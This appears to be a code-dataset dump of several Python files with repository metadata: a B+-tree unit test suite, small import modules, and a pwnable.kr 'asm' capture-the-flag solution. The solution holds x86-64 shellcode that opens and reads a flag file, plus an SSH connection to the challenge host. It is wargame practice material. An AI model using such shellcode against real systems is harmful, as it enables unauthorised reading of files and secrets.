| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e76e9d60ab85937b85c7285fc651d4e9e23993c2
| 83
|
py
|
Python
|
pyck/tests/test_lib_models.py
|
kashifpk/PyCK
|
11513c6b928d37afcf83de717e8d2f74fce731af
|
[
"Ruby"
] | 2
|
2015-01-11T22:23:58.000Z
|
2016-05-17T06:57:57.000Z
|
pyck/tests/test_lib_models.py
|
kashifpk/PyCK
|
11513c6b928d37afcf83de717e8d2f74fce731af
|
[
"Ruby"
] | 31
|
2015-01-14T11:30:50.000Z
|
2017-01-31T14:35:48.000Z
|
pyck/tests/test_lib_models.py
|
kashifpk/PyCK
|
11513c6b928d37afcf83de717e8d2f74fce731af
|
[
"Ruby"
] | null | null | null |
from pyck.forms import Form
import os
def test_pyck_lib_get_models_1():
pass
| 11.857143
| 33
| 0.771084
| 15
| 83
| 3.933333
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014706
| 0.180723
| 83
| 6
| 34
| 13.833333
| 0.852941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
e79bb28278e6f20d27b9dc67440e52d0d9453c3d
| 184
|
py
|
Python
|
pbrl/algorithms/td3/__init__.py
|
jjccero/rl
|
45d1a464ec661278372fce2c1d972d02457e21f6
|
[
"MIT"
] | 11
|
2021-08-28T09:38:01.000Z
|
2021-09-18T05:15:23.000Z
|
pbrl/algorithms/td3/__init__.py
|
jjccero/rl
|
45d1a464ec661278372fce2c1d972d02457e21f6
|
[
"MIT"
] | null | null | null |
pbrl/algorithms/td3/__init__.py
|
jjccero/rl
|
45d1a464ec661278372fce2c1d972d02457e21f6
|
[
"MIT"
] | null | null | null |
from pbrl.algorithms.td3.buffer import ReplayBuffer
from pbrl.algorithms.td3.policy import Policy
from pbrl.algorithms.td3.runner import Runner
from pbrl.algorithms.td3.td3 import TD3
| 36.8
| 51
| 0.847826
| 28
| 184
| 5.571429
| 0.321429
| 0.205128
| 0.461538
| 0.538462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 0.086957
| 184
| 4
| 52
| 46
| 0.892857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
99becf3a9198b9adf3b9ce47327d5ac5748aefdb
| 182
|
py
|
Python
|
limix_ext/gcta/core/plink_/test/test_write.py
|
glimix/limix-ext
|
7cf7a3b2b02f6a73cbba90f1945a06b9295b7357
|
[
"MIT"
] | null | null | null |
limix_ext/gcta/core/plink_/test/test_write.py
|
glimix/limix-ext
|
7cf7a3b2b02f6a73cbba90f1945a06b9295b7357
|
[
"MIT"
] | 2
|
2017-06-05T08:29:22.000Z
|
2017-06-07T16:54:54.000Z
|
limix_ext/gcta/core/plink_/test/test_write.py
|
glimix/limix-ext
|
7cf7a3b2b02f6a73cbba90f1945a06b9295b7357
|
[
"MIT"
] | null | null | null |
def test_plink_write_map():
from limix_ext.gcta.core.plink_.write import write_map
def test_plink_write_phen():
from limix_ext.gcta.core.plink_.write import write_phen_int
| 26
| 63
| 0.802198
| 31
| 182
| 4.290323
| 0.419355
| 0.300752
| 0.180451
| 0.255639
| 0.616541
| 0.616541
| 0.616541
| 0.616541
| 0.616541
| 0
| 0
| 0
| 0.120879
| 182
| 6
| 64
| 30.333333
| 0.83125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0.5
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
99c1b343df331d6278cd13f141dead0916127b43
| 205
|
py
|
Python
|
bitmovin/resources/models/encodings/start/manifests/__init__.py
|
bitmovin/bitmovin-python
|
d183718d640117dd75141da261901dc2f60433b0
|
[
"Unlicense"
] | 44
|
2016-12-12T17:37:23.000Z
|
2021-03-03T09:48:48.000Z
|
bitmovin/resources/models/encodings/start/manifests/__init__.py
|
bitmovin/bitmovin-python
|
d183718d640117dd75141da261901dc2f60433b0
|
[
"Unlicense"
] | 38
|
2017-01-09T14:45:45.000Z
|
2022-02-27T18:04:33.000Z
|
bitmovin/resources/models/encodings/start/manifests/__init__.py
|
bitmovin/bitmovin-python
|
d183718d640117dd75141da261901dc2f60433b0
|
[
"Unlicense"
] | 27
|
2017-02-02T22:49:31.000Z
|
2019-11-21T07:04:57.000Z
|
from .start_manifest import StartManifest
from .vod_start_manifest import VodStartManifest
from .vod_dash_start_manifest import VodDashStartManifest
from .vod_hls_start_manifest import VodHlsStartManifest
| 41
| 57
| 0.902439
| 25
| 205
| 7.04
| 0.44
| 0.295455
| 0.431818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078049
| 205
| 4
| 58
| 51.25
| 0.931217
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
99d633c413ed4419ef6c1a8c94ee7795582ddb61
| 21,505
|
py
|
Python
|
query-opt/py/tests.py
|
sean-chester/relational-databases
|
9d1d2da00d7d7517c34aab80bb1bcae930a2e706
|
[
"Unlicense"
] | null | null | null |
query-opt/py/tests.py
|
sean-chester/relational-databases
|
9d1d2da00d7d7517c34aab80bb1bcae930a2e706
|
[
"Unlicense"
] | null | null | null |
query-opt/py/tests.py
|
sean-chester/relational-databases
|
9d1d2da00d7d7517c34aab80bb1bcae930a2e706
|
[
"Unlicense"
] | 8
|
2022-03-02T19:39:03.000Z
|
2022-03-22T06:21:25.000Z
|
# Test cases for ImplementMe class.
# The mocked objects (and therefore expected output) may change
# at the point of evaluation, including into a more complex object,
# but the functionality tested by each test case will not.
# Your implementation should anticipate ways in which these mocks could
# be more complex.
#
# Three cases are not yet disclosed; they will be challenging combinations
# of existing test cases.
import unittest
import time
import timeout_decorator
from node import *
from index import *
from implement_me import ImplementMe
# Insert into an empty tree
class TestCase01(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_insertion(self):
btree = Index([])
key = 99
expected_output = Index([Node()]*1)
expected_output.nodes[ 0 ] = Node(\
KeySet((99, -1)),\
PointerSet((0,0,0)))
self.assertEqual( expected_output, ImplementMe.InsertIntoIndex( btree, key ) )
# Insert existing key
class TestCase02(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_insertion(self):
btree = Index([Node()]*1)
btree.nodes[ 0 ] = Node(\
KeySet((99, -1)),\
PointerSet((0,0,0)))
key = 99
expected_output = Index([Node()]*1)
expected_output.nodes[ 0 ] = Node(\
KeySet((99, -1)),\
PointerSet((0,0,0)))
self.assertEqual( expected_output, ImplementMe.InsertIntoIndex( btree, key ) )
# Insert into existing node that is not full
class TestCase03(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_insertion(self):
btree = Index([Node()]*1)
btree.nodes[ 0 ] = Node(\
KeySet((87, -1)),\
PointerSet((0,0,0)))
key = 66
expected_output = Index([Node()]*1)
expected_output.nodes[ 0 ] = Node(\
KeySet((66, 87)),\
PointerSet((0,0,0)))
self.assertEqual( expected_output, ImplementMe.InsertIntoIndex( btree, key ) )
# Insert into full node.
class TestCase04(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_insertion(self):
btree = Index([Node()]*1)
btree.nodes[ 0 ] = Node(\
KeySet((66, 99)),\
PointerSet((0,0,0)))
key = 87
expected_output = Index([Node()]*4)
expected_output.nodes[0] = Node(\
KeySet((87, -1)),\
PointerSet((1,2,0)))
expected_output.nodes[1] = Node(\
KeySet((66,-1)),\
PointerSet((0,0,2)))
expected_output.nodes[2]=Node(\
KeySet((87,99)),\
PointerSet((0,0,0)))
self.assertEqual( expected_output, ImplementMe.InsertIntoIndex( btree, key ) )
# Insert into full node with full parent, causing root split.
class TestCase05(unittest.TestCase):
@timeout_decorator.timeout(25)
def test_insertion(self):
btree = Index([Node()]*4)
btree.nodes[0] = Node(\
KeySet((42, 66)),\
PointerSet((1,2,3)))
btree.nodes[1] = Node(\
KeySet((7,-1)),\
PointerSet((0,0,2)))
btree.nodes[2]=Node(\
KeySet((42,-1)),\
PointerSet((0,0,3)))
btree.nodes[3]=Node(\
KeySet((66,87)),\
PointerSet((0,0,0)))
key = 99
expected_output = Index([Node()]*13)
expected_output.nodes[0] = Node(\
KeySet((66, -1)),\
PointerSet((1,2,0)))
expected_output.nodes[1] = Node(\
KeySet((42,-1)),\
PointerSet((4,5,0)))
expected_output.nodes[2]=Node(\
KeySet((87,-1)),\
PointerSet((7,8,0)))
expected_output.nodes[4]=Node(\
KeySet((7,-1)),\
PointerSet((0,0,5)))
expected_output.nodes[5]=Node(\
KeySet((42,-1)),\
PointerSet((0,0,7)))
expected_output.nodes[7]=Node(\
KeySet((66,-1)),\
PointerSet((0,0,8)))
expected_output.nodes[8]=Node(\
KeySet((87,99)),\
PointerSet((0,0,0)))
self.assertEqual( expected_output, ImplementMe.InsertIntoIndex( btree, key ) )
# Insert into full node with full parent, but does not cause a root split.
# Note that only the path that should be affected has correct data (testing complexity)
# Linearisation forces copy of some nodes to new addresses
class TestCase06(unittest.TestCase):
@timeout_decorator.timeout(25)
def test_insertion(self):
btree = Index([Node()]*13)
btree.nodes[0] = Node(\
KeySet((7, -1)),\
PointerSet((1,2,0)))
btree.nodes[2]=Node(\
KeySet((27,66)),\
PointerSet((7,8,9)))
btree.nodes[6]=Node(\
KeySet((11,11)),\
PointerSet((0,0,90))) # Dummy data for test
btree.nodes[7]=Node(\
KeySet((7,9)),\
PointerSet((0,0,8)))
btree.nodes[8]=Node(\
KeySet((27,-1)),\
PointerSet((0,0,9)))
btree.nodes[9]=Node(\
KeySet((66,88)),\
PointerSet((0,0,0)))
key = 12
expected_output = Index([Node()]*13)
expected_output.nodes[0] = Node(\
KeySet((7, 27)),\
PointerSet((1,2,3)))
expected_output.nodes[2] = Node(\
KeySet((9,-1)),\
PointerSet((7,8,0)))
expected_output.nodes[3]=Node(\
KeySet((66,-1)),\
PointerSet((10,11,0)))
expected_output.nodes[6]=Node(\
KeySet((11,11)),\
PointerSet((0,0,90))) # Dummy data for test
expected_output.nodes[7]=Node(\
KeySet((7,-1)),\
PointerSet((0,0,8)))
expected_output.nodes[8]=Node(\
KeySet((9,12)),\
PointerSet((0,0,10)))
expected_output.nodes[10]=Node(\
KeySet((27,-1)),\
PointerSet((0,0,11)))
expected_output.nodes[11]=Node(\
KeySet((66,88)),\
PointerSet((0,0,0)))
self.assertEqual( expected_output, ImplementMe.InsertIntoIndex( btree, key ) )
# Insertion causes splits that propagates at least three times
# Note that only the path that should be affected has correct data (testing complexity)
# Linearisation forces copy of some nodes to new addresses
class TestCase07(unittest.TestCase):
@timeout_decorator.timeout(25)
def test_insertion(self):
btree = Index([Node()]*13)
btree.nodes[0] = Node(\
KeySet((7, 99)),\
PointerSet((1,2,0)))
btree.nodes[2]=Node(\
KeySet((27,66)),\
PointerSet((7,8,9)))
btree.nodes[7]=Node(\
KeySet((7,9)),\
PointerSet((0,0,8)))
btree.nodes[8]=Node(\
KeySet((27,-1)),\
PointerSet((0,0,9)))
btree.nodes[9]=Node(\
KeySet((66,88)),\
PointerSet((0,0,0)))
key = 12
expected_output = Index([Node()]*40)
expected_output.nodes[0] = Node(\
KeySet((27, -1)),\
PointerSet((1,2,0)))
expected_output.nodes[1] = Node(\
KeySet((7, -1)),\
PointerSet((4,5,0)))
expected_output.nodes[2] = Node(\
KeySet((99, -1)),\
PointerSet((7,8,0)))
expected_output.nodes[5] = Node(\
KeySet((9,-1)),\
PointerSet((16,17,0)))
expected_output.nodes[7]=Node(\
KeySet((66,-1)),\
PointerSet((22,23,0)))
expected_output.nodes[16]=Node(\
KeySet((7,-1)),\
PointerSet((0,0,17)))
expected_output.nodes[17]=Node(\
KeySet((9,12)),\
PointerSet((0,0,22)))
expected_output.nodes[22]=Node(\
KeySet((27,-1)),\
PointerSet((0,0,23)))
expected_output.nodes[23]=Node(\
KeySet((66,88)),\
PointerSet((0,0,0)))
self.assertEqual( expected_output, ImplementMe.InsertIntoIndex( btree, key ) )
# Boundary case: lookup smallest key in tree
# Fake data in last node to test complexity
class TestCase08(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_lookup(self):
btree = Index([Node()]*4)
btree.nodes[0] = Node(\
KeySet((42, 66)),\
PointerSet((1,2,3)))
btree.nodes[1] = Node(\
KeySet((9,-1)),\
PointerSet((0,0,2)))
btree.nodes[2]=Node(\
KeySet((42,-1)),\
PointerSet((0,0,3)))
btree.nodes[3]=Node(\
KeySet((66,7)),\
PointerSet((0,0,0)))
key = 9
expected_output = True
self.assertEqual( expected_output, ImplementMe.LookupKeyInIndex( btree, key ) )
# Boundary case: lookup largest key in tree
# Fake data in first node to test complexity
class TestCase09(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_lookup(self):
btree = Index([Node()]*4)
btree.nodes[0] = Node(\
KeySet((42, 66)),\
PointerSet((1,2,3)))
btree.nodes[1] = Node(\
KeySet((7,99)),\
PointerSet((0,0,2)))
btree.nodes[2]=Node(\
KeySet((42,-1)),\
PointerSet((0,0,3)))
btree.nodes[3]=Node(\
KeySet((66,87)),\
PointerSet((0,0,0)))
key = 87
expected_output = True
self.assertEqual( expected_output, ImplementMe.LookupKeyInIndex( btree, key ) )
# Lookup key outside range of tree's keys
# Fake data in middle leaf to test complexity
class TestCase10(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_lookup(self):
btree = Index([Node()]*4)
btree.nodes[0] = Node(\
KeySet((42, 66)),\
PointerSet((1,2,3)))
btree.nodes[1] = Node(\
KeySet((9,-1)),\
PointerSet((0,0,2)))
btree.nodes[2]=Node(\
KeySet((7,-1)),\
PointerSet((0,0,3)))
btree.nodes[3]=Node(\
KeySet((66,99)),\
PointerSet((0,0,0)))
key = 7
expected_output = False
self.assertEqual( expected_output, ImplementMe.LookupKeyInIndex( btree, key ) )
# Lookup key within tree's range but not in tree
# Fake data in one leaf to test complexity
class TestCase11(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_lookup(self):
btree = Index([Node()]*4)
btree.nodes[0] = Node(\
KeySet((42, 66)),\
PointerSet((1,2,3)))
btree.nodes[1] = Node(\
KeySet((7,-1)),\
PointerSet((0,0,2)))
btree.nodes[2]=Node(\
KeySet((42,-1)),\
PointerSet((0,0,3)))
btree.nodes[3]=Node(\
KeySet((66,9)),\
PointerSet((0,0,0)))
key = 9
expected_output = False
self.assertEqual( expected_output, ImplementMe.LookupKeyInIndex( btree, key ) )
# Lookup key strictly within the tree's range
class TestCase12(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_lookup(self):
btree = Index([Node()]*4)
btree.nodes[0] = Node(\
KeySet((41, 66)),\
PointerSet((1,2,3)))
btree.nodes[1] = Node(\
KeySet((7,-1)),\
PointerSet((0,0,2)))
btree.nodes[2]=Node(\
KeySet((42,-1)),\
PointerSet((0,0,3)))
btree.nodes[3]=Node(\
KeySet((66,99)),\
PointerSet((0,0,0)))
key = 42
expected_output = True
self.assertEqual( expected_output, ImplementMe.LookupKeyInIndex( btree, key ) )
# Range query fully contained in one leaf node
# Fake data in other node to test complexity
class TestCase13(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_range(self):
btree = Index([Node()]*4)
btree.nodes[0] = Node(\
KeySet((42, 66)),\
PointerSet((1,2,3)))
btree.nodes[1] = Node(\
KeySet((7,68)),\
PointerSet((0,0,2)))
btree.nodes[2]=Node(\
KeySet((42,-1)),\
PointerSet((0,0,3)))
btree.nodes[3]=Node(\
KeySet((66,99)),\
PointerSet((0,0,0)))
lower_bound = 66
upper_bound = 87
expected_output = [66]
self.assertEqual( expected_output, ImplementMe.RangeSearchInIndex( btree, lower_bound, upper_bound ) )
# Range query half-open to the left
# Fake data in one node to test complexity.
class TestCase14(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_range(self):
btree = Index([Node()]*4)
btree.nodes[0] = Node(\
KeySet((42, 66)),\
PointerSet((1,2,3)))
btree.nodes[1] = Node(\
KeySet((7,-1)),\
PointerSet((0,0,2)))
btree.nodes[2]=Node(\
KeySet((42,-1)),\
PointerSet((0,0,3)))
btree.nodes[3]=Node(\
KeySet((66,9)),\
PointerSet((0,0,0)))
lower_bound = 0
upper_bound = 42
expected_output = [7]
self.assertEqual( expected_output, ImplementMe.RangeSearchInIndex( btree, lower_bound, upper_bound ) )
# Range query half-open to the right
# Fake data in one node to test complexity
class TestCase15(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_range(self):
btree = Index([Node()]*4)
btree.nodes[0] = Node(\
KeySet((42, 66)),\
PointerSet((1,2,3)))
btree.nodes[1] = Node(\
KeySet((7,68)),\
PointerSet((0,0,2)))
btree.nodes[2]=Node(\
KeySet((42,-1)),\
PointerSet((0,0,3)))
btree.nodes[3]=Node(\
KeySet((66,87)),\
PointerSet((0,0,0)))
lower_bound = 42
upper_bound = 99
expected_output = [42,66,87]
self.assertEqual( expected_output, ImplementMe.RangeSearchInIndex( btree, lower_bound, upper_bound ) )
# Range query with matching upper and lower bound
# Key not in tree but found as fake data in a different node to test complexity
class TestCase16(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_range(self):
btree = Index([Node()]*4)
btree.nodes[0] = Node(\
KeySet((42, 66)),\
PointerSet((1,2,3)))
btree.nodes[1] = Node(\
KeySet((7,-1)),\
PointerSet((0,0,2)))
btree.nodes[2]=Node(\
KeySet((42,-1)),\
PointerSet((0,0,3)))
btree.nodes[3]=Node(\
KeySet((66,7)),\
PointerSet((0,0,0)))
lower_bound = 7
upper_bound = 7
expected_output = []
self.assertEqual( expected_output, ImplementMe.RangeSearchInIndex( btree, lower_bound, upper_bound ) )
# Multi-leaf range query in middle of tree
# Fake data in first node to test complexity
class TestCase17(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_range(self):
btree = Index([Node()]*4)
btree.nodes[0] = Node(\
KeySet((42, 66)),\
PointerSet((1,2,3)))
btree.nodes[1] = Node(\
KeySet((68,-1)),\
PointerSet((0,0,2)))
btree.nodes[2]=Node(\
KeySet((42,-1)),\
PointerSet((0,0,3)))
btree.nodes[3]=Node(\
KeySet((66,99)),\
PointerSet((0,0,0)))
lower_bound = 42
upper_bound = 87
expected_output = [42,66]
self.assertEqual( expected_output, ImplementMe.RangeSearchInIndex( btree, lower_bound, upper_bound ) )
# Lookup recently added key
class TestCase18(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_unknown(self):
btree = Index([Node()]*13)
btree.nodes[0] = Node(\
KeySet((7, 99)),\
PointerSet((1,2,3)))
btree.nodes[2]=Node(\
KeySet((27,66)),\
PointerSet((7,8,9)))
btree.nodes[7]=Node(\
KeySet((7,9)),\
PointerSet((0,0,8)))
btree.nodes[8]=Node(\
KeySet((27,-1)),\
PointerSet((0,0,9)))
btree.nodes[9]=Node(\
KeySet((66,88)),\
PointerSet((0,0,0)))
key = 12
expected_output = True
self.assertEqual( expected_output, ImplementMe.LookupKeyInIndex(\
ImplementMe.InsertIntoIndex( btree, key ), key ) )
# Lookup range that includes recently added key
class TestCase19(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_unknown(self):
btree = Index([Node()]*13)
btree.nodes[0] = Node(\
KeySet((7, 99)),\
PointerSet((1,2,3)))
btree.nodes[2]=Node(\
KeySet((27,66)),\
PointerSet((7,8,9)))
btree.nodes[7]=Node(\
KeySet((7,9)),\
PointerSet((0,0,8)))
btree.nodes[8]=Node(\
KeySet((27,-1)),\
PointerSet((0,0,9)))
btree.nodes[9]=Node(\
KeySet((66,88)),\
PointerSet((0,0,0)))
key = 12
lower_bound = 12
upper_bound = 66
expected_output = [12,27]
self.assertEqual( expected_output, ImplementMe.RangeSearchInIndex(\
ImplementMe.InsertIntoIndex( btree, key ), lower_bound, upper_bound ) )
# Lookup range with nearly matching lower and upper bound equal to recently added key
class TestCase20(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_unknown(self):
btree = Index([Node()]*13)
btree.nodes[0] = Node(\
KeySet((7, 99)),\
PointerSet((1,2,3)))
btree.nodes[2]=Node(\
KeySet((27,66)),\
PointerSet((7,8,9)))
btree.nodes[7]=Node(\
KeySet((7,9)),\
PointerSet((0,0,8)))
btree.nodes[8]=Node(\
KeySet((27,-1)),\
PointerSet((0,0,9)))
btree.nodes[9]=Node(\
KeySet((66,88)),\
PointerSet((0,0,0)))
key = 12
lower_bound = 12
upper_bound = 13
expected_output = [12]
self.assertEqual( expected_output, ImplementMe.RangeSearchInIndex(\
ImplementMe.InsertIntoIndex( btree, key ), lower_bound, upper_bound ) )
# Freebie bonus for grinding out a tough semester
# Look up a key in an empty tree
class TestCaseB1(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_unknown(self):
btree = Index([Node()]*1)
key = 9
expected_output = False
self.assertEqual( expected_output, ImplementMe.LookupKeyInIndex( btree, key ) )
# Easy bonus for assignment difficulty calibration
# Insert in order
class TestCaseB2(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_unknown(self):
btree = Index([Node()]*1)
btree.nodes[ 0 ] = Node(\
KeySet((66, -1)),\
PointerSet((0,0,0)))
key = 87
expected_output = Index([Node()]*1)
expected_output.nodes[ 0 ] = Node(\
KeySet((66, 87)),\
PointerSet((0,0,0)))
self.assertEqual( expected_output, ImplementMe.InsertIntoIndex( btree, key ) )
# Easy bonus for assignment difficulty calibration
# Look up a key inserted into a tree with only one element
class TestCaseB3(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_unknown(self):
btree = Index([Node()]*1)
btree.nodes[0] = Node(\
KeySet((7, -1)),\
PointerSet((0,0,0)))
key = 12
expected_output = True
self.assertEqual( expected_output, ImplementMe.LookupKeyInIndex(\
ImplementMe.InsertIntoIndex( btree, key ), key ) )
# Easy bonus for assignment difficulty calibration
# Range query that doesn't overlap tree at all
class TestCaseB4(unittest.TestCase):
@timeout_decorator.timeout(15)
def test_unknown(self):
btree = Index([Node()]*4)
btree.nodes[0] = Node(\
KeySet((42, 66)),\
PointerSet((1,2,3)))
btree.nodes[1] = Node(\
KeySet((7,87)),\
PointerSet((0,0,2)))
btree.nodes[2]=Node(\
KeySet((42,-1)),\
PointerSet((0,0,3)))
btree.nodes[3]=Node(\
KeySet((66,68)),\
PointerSet((0,0,0)))
lower_bound = 87
upper_bound = 99
expected_output = []
self.assertEqual( expected_output, ImplementMe.RangeSearchInIndex( btree, lower_bound, upper_bound ) )
# Run all unit tests above.
unittest.main(argv=[''],verbosity=2, exit=False)
| 31.906528
| 110
| 0.526715
| 2,466
| 21,505
| 4.527981
| 0.093674
| 0.098513
| 0.081677
| 0.045406
| 0.84014
| 0.812735
| 0.795003
| 0.769031
| 0.751657
| 0.73491
| 0
| 0.070368
| 0.326622
| 21,505
| 673
| 111
| 31.953938
| 0.700711
| 0.111555
| 0
| 0.853565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046243
| 1
| 0.046243
| false
| 0
| 0.011561
| 0
| 0.104046
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
99d6f6cf363d668052bc1b7957cce42a5a932207
| 2,379
|
py
|
Python
|
asm/asm.py
|
FrancescoLucarini/pwnable.kr-exploits
|
39bee10e2145a3ad2baa773c752f145f19e25af5
|
[
"MIT"
] | 1
|
2021-02-09T14:11:52.000Z
|
2021-02-09T14:11:52.000Z
|
asm/asm.py
|
FrancescoLucarini/pwnable.kr-exploits
|
39bee10e2145a3ad2baa773c752f145f19e25af5
|
[
"MIT"
] | null | null | null |
asm/asm.py
|
FrancescoLucarini/pwnable.kr-exploits
|
39bee10e2145a3ad2baa773c752f145f19e25af5
|
[
"MIT"
] | null | null | null |
from pwn import *
context.update(arch="amd64", os="linux", bits="64")
file_name = "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong"+"\x00"
v1 = [""]*(int(len(file_name)/8)+8)
for v0 in range(int(len(file_name)/8)):
v1[v0] = p64(int((file_name[(v0*8):(v0+1)*8].encode("ascii")).hex(), 16))
print(hexdump(v1)) #print(p64(int((file_name.encode("ascii")).hex(), 16)))
shellcode="\xb0\x02\x48\x31\xff\x57\x48\xbf\x30\x6f\x30\x6f\x30\x6f\x6e\x67\x57\x48\xbf\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x57\x48\xbf\x30\x30\x30\x30\x30\x30\x30\x30\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x30\x30\x30\x30\x30\x30\x6f\x6f\x57\x48\xbf\x30\x30\x30\x30\x30\x30\x30\x30\x57\x48\xbf\x30\x30\x30\x30\x30\x30\x30\x30\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6c\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x69\x73\x5f\x76\x65\x72\x79\x5f\x57\x48\xbf\x6c\x65\x5f\x6e\x61\x6d\x65\x5f\x57\x48\xbf\x79\x5f\x74\x68\x65\x5f\x66\x69\x57\x48\xbf\x69\x6c\x65\x2e\x73\x6f\x72\x72\x57\x48\xbf\x64\x5f\x74\x68\x69\x73\x5f\x66\x57\x48\xbf\x65\x61\x73\x65\x5f\x72\x65\x61\x57\x48\xbf\x5f\x66\x69\x6c\x65\x5f\x70\x6c\x57\x48\xbf\x2e\x6b\x72\x5f\x66\x6c\x61\x67\x57\x48\xbf\x5f\x70\x77\x6e\x61\x62\x6c\x65\x57\x48\xbf\x2f\x74\x68\x69\x73\x5f\x69\x73\x57\x48\xbf\x2e\x2f\x2e\x2f\x2e\x2f\x2e\x2f\x57\x48\x89\xe7\x48\x31\xf6\x0f\x05\x89\xc7\x30\xc0\x48\x89\xe6\xb2\x64\x0f\x05\xb0\x01\x48\x31\xff\x48\x83\xc7\x01\x0f\x05\xb0\x60\x48\x31\xff\x0f\x05"
server = ["pwnable.kr", 2222, "asm", "guest"]
server_nc = ["pwnable.kr", 9026]
conn_ssh = ssh(host=server[0], port=server[1], user=server[2], password=server[3])
conn_nc = conn_ssh.remote(server_nc[0], server_nc[1])
conn_nc.send(shellcode)
print(conn_nc.recv(2024, timeout=0.5))
print(conn_nc.recv(2024, timeout=0.5))
| 148.6875
| 1,504
| 0.749475
| 505
| 2,379
| 3.475248
| 0.209901
| 0.290598
| 0.364103
| 0.396581
| 0.437037
| 0.402849
| 0.387464
| 0.387464
| 0.355556
| 0.324786
| 0
| 0.266265
| 0.02438
| 2,379
| 15
| 1,505
| 158.6
| 0.489875
| 0.022699
| 0
| 0.133333
| 0
| 0.066667
| 0.762478
| 0.741394
| 0.066667
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0.066667
| 0.066667
| 0
| 0.066667
| 0.2
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
